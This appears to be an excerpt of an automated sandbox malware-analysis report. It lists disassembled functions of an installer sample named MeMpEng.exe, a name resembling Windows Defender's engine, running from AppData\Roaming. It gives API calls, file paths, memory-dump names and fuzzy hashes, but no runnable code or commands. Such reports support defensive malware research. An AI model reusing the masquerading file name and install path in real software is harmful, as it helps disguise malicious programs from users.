                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                                          • Instruction ID: 31ba3c168d84f0c85bcad1357d39928db2ba622a9cc012c1a012c7db44d830b4
                                                          • Opcode Fuzzy Hash: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                                          • Instruction Fuzzy Hash: 66218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                          APIs
                                                          • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
                                                          • wsprintfW.USER32 ref: 00404E2A
                                                          • SetDlgItemTextW.USER32 ref: 00404E3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                          • Instruction ID: afd2be291b2a15d2af8ae11ee91158e81c8ac3063311500d61ab43a3e8b0c9b4
                                                          • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                          • Instruction Fuzzy Hash: 6F11E77360423837DB10996D9C45E9E3298DF85374F254237FA66F31D1EA79DC2182E8
                                                          APIs
                                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(?), ref: 00405EDC
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                                          • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405F84
                                                          • GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                                          • API String ID: 3248276644-105541177
                                                          • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                          • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                                          • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                          • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                                          • CharPrevW.USER32(?,00000000), ref: 00405E33
                                                          • lstrcatW.KERNEL32 ref: 00405E45
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4017390910
                                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                          • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                          • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6A2B1171
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6A2B11E3
                                                          • GlobalFree.KERNEL32 ref: 6A2B124A
                                                          • GlobalFree.KERNEL32(?), ref: 6A2B129B
                                                          • GlobalFree.KERNEL32(00000000), ref: 6A2B12B1
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 5d5181be0968a642d49a1dd1b2d88da872d24f0ee4d6e75f306e9b3960089134
                                                          • Instruction ID: 3ca18ec605add672b285bc88603ac1114c8d639c26782fbae73c0de5cb1c91a6
                                                          • Opcode Fuzzy Hash: 5d5181be0968a642d49a1dd1b2d88da872d24f0ee4d6e75f306e9b3960089134
                                                          • Instruction Fuzzy Hash: BC519F7559021AEFEB04CF68C88CA1677F8FB0A39DB454929F905DB651EB34ED80CB60
                                                          APIs
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll), ref: 004026BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsn59E.tmp$C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll
                                                          • API String ID: 1659193697-1064184502
                                                          • Opcode ID: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
                                                          • Instruction ID: 017f71272b68274a12e342b3970613002fe1d3414b89f7e2a3fd3533f9475010
                                                          • Opcode Fuzzy Hash: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
                                                          • Instruction Fuzzy Hash: C7110D72A10206BBCB00BBB19F46AAE7B616F51748F20843FF502F61D1DAFD8851631E
                                                          APIs
                                                          • DestroyWindow.USER32 ref: 00403051
                                                          • GetTickCount.KERNEL32(00000000,0040321C,00000001), ref: 0040306F
                                                          • CreateDialogParamW.USER32 ref: 0040308C
                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                                          • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                                          • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                                          • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040557C
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055CD
                                                            • Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                          • Instruction ID: 8cb385540c394feb6b7acedb458c1b163c7bd0e2eecbca803c6ec6ccc0281e24
                                                          • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                          • Instruction Fuzzy Hash: 68017C71101609FBEF205F11DD84A9B3A2BEBC4754F20403BFA05761D5D73A8D929E6D
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,7570D4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,?,?,00000008,0000000A,0000000C), ref: 00403BAB
                                                          • GlobalFree.KERNEL32(008EBFD8), ref: 00403BB2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-4017390910
                                                          • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                          • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                                          • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                          • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming,0040310E,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\MeMpEng.exe,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00405E75
                                                          • CharPrevW.USER32(80000000,00000000), ref: 00405E85
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00405E6F
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 2709904686-2707566632
                                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                          • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                          • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                          • CharNextA.USER32(00000000), ref: 00405FE2
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9